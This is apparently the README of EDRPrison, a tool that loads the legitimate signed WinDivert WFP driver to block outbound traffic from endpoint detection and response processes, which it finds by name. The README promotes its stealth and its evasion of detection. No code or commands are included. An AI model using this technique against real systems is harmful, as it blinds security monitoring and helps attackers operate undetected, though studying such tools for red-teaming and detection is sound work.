EDRPrison: Silencing EDRs with Legitimate WFP Drivers
EDRPrison
EDRPrison leverages a legitimate WFP callout driver, WinDivert, to effectively silence EDR systems. Drawing inspiration from tools like Shutter, FireBlock, and EDRSilencer, this project focuses on network-based evasion techniques. Unlike its predecessors, EDRPrison installs and loads an external legitimate WFP callout driver instead of relying solely on the built-in WFP. Additionally, it blocks outbound traffic from EDR processes by dynamically adding runtime filters without directly interacting with the EDR processes or their executables.
In summary, EDRPrison has the following key features and capabilities
- Legitimate WFP Callout Driver: Utilizes a legitimate WFP callout driver to enhance capabilities while maintaining a benign profile.
- EDR Process Detection: Searches for running EDR processes based on predefined process names.
- Packet Identification: Identifies packets originating from EDR processes.
- Dynamic Filter Addition: Dynamically adds WFP filters based on the source process of the packets.
- Non-Intrusive Approach: Avoids direct interaction with EDR processes and their executables, ensuring stealth and reducing the risk of detection.
Please refer to the article for more technical details.
Components
Elevated privileges are required to run EDRPrison successfully. EDRPrison comprises the following three components:
- EDRPrison: They are the main program and its dependencies. Its first execution installs the WinDivert driver.
- WinDivert64.sys: This is the signed WFP callout driver.
- WinDivert.dll: A component of the WinDivert project.
Benefits And Improvements
EDRPrison offers several enhancements and improvements over its predecessors, making it a more robust and stealthy tool for network-based EDR evasion:
- Instead of adding static WFP filters to EDR process executables, EDRPrison dynamically adds runtime WFP filters based on the packets’ source process.
- Avoids obtaining a handle to EDR processes or EDR executables, reducing the risk of detection and interference with the EDR systems.
- By loading a legitimate WFP callout driver, EDRPrison extends its capabilities while maintaining a benign profile.
